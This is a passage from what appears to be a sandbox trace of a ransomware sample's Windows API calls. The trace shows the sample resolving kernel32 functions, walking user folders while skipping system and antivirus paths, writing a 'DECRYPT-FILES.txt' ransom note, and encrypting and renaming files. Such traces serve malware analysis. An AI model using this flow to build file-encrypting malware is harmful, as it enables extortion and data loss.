lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.803] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.803] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.803] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.803] lstrlenA (lpString="DELETEATOM") returned 10 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.803] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.803] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.803] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.804] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.804] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.804] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.804] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.804] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.804] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.804] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.804] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.804] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.804] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.804] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.804] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.804] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.804] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.804] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.804] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.804] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.804] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.804] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.805] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.805] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.805] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.805] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.805] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.805] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.805] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.805] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.805] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.805] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.805] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.805] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.805] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.805] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.805] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.805] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.805] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.805] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.806] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx") returned 62 [0083.806] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx.jB1nu") returned 68 [0083.806] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aswb1htgteqdyep-2.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASwb1HtgtEQdYep-2.pptx.jB1nu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aswb1htgteqdyep-2.pptx.jb1nu"), dwFlags=0x0) returned 1 [0083.806] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.807] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.807] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.807] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xce661d40, ftLastAccessTime.dwHighDateTime=0x1d4cd0b, ftLastWriteTime.dwLowDateTime=0xce661d40, ftLastWriteTime.dwHighDateTime=0x1d4cd0b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CySgPL_RS7_GjN8uh", cAlternateFileName="CYSGPL~1")) returned 1 [0083.807] lstrcmpW (lpString1="CySgPL_RS7_GjN8uh", lpString2=".") returned 1 [0083.807] lstrcmpW (lpString1="CySgPL_RS7_GjN8uh", lpString2="..") returned 1 [0083.807] lstrcatW (in: lpString1="CySgPL_RS7_GjN8uh", lpString2="\\" | out: lpString1="CySgPL_RS7_GjN8uh\\") returned="CySgPL_RS7_GjN8uh\\" [0083.807] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Program Files") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch=":\\Windows") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Games\\") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\All Users") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="AhnLab") returned 0x0 [0083.808] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.808] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.808] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\jkbimi8.tmp") returned 70 [0083.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0083.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.808] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.808] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\DECRYPT-FILES.txt") returned 76 [0083.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0083.809] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0083.809] CloseHandle (hObject=0x414) returned 1 [0083.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*" [0083.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xae2624e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae2624e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0083.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.810] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xae2624e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae2624e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.810] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e71a90, ftCreationTime.dwHighDateTime=0x1d4d19b, ftLastAccessTime.dwLowDateTime=0xb2070070, ftLastAccessTime.dwHighDateTime=0x1d4d14c, ftLastWriteTime.dwLowDateTime=0xb2070070, ftLastWriteTime.dwHighDateTime=0x1d4d14c, nFileSizeHigh=0x0, nFileSizeLow=0x11584, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xwnnge1dMI4u1n8p.ppt", cAlternateFileName="7XWNNG~1.PPT")) returned 1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="DECRYPT-FILES.txt") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="autorun.inf") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="boot.ini") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="desktop.ini") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="ntuser.dat") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="iconcache.db") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="bootsect.bak") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="ntuser.dat.log") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="thumbs.db") returned -1 [0083.810] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt", lpString2="Bootfont.bin") returned -1 [0083.810] lstrlenW (lpString="7xwnnge1dMI4u1n8p.ppt") returned 21 [0083.810] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0083.810] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0083.810] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0083.810] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0083.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.810] lstrlenW (lpString="7xwnnge1dMI4u1n8p.ppt") returned 21 [0083.810] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="7xwnnge1dMI4u1n8p.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt" [0083.810] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\7xwnnge1dmi4u1n8p.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.811] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=71044) returned 1 [0083.811] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.811] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.811] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.811] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.811] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.811] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.812] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.813] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.813] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.814] CloseHandle (hObject=0x42c) returned 1 [0083.814] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.814] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.815] CloseHandle (hObject=0x0) returned 0 [0083.815] CloseHandle (hObject=0x428) returned 1 [0083.815] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.815] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.815] GetTickCount () returned 0x114d6c0 [0083.815] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.815] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.816] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.816] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.816] lstrlenA (lpString="kernel32.dll") returned 12 [0083.816] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.816] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.816] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.816] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.816] lstrlenA (lpString="ADDATOMA") returned 8 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.816] lstrlenA (lpString="ADDATOMW") returned 8 [0083.816] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.816] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.817] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.817] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.817] lstrcpyA (in: lpString1=0x3f2d1ec, 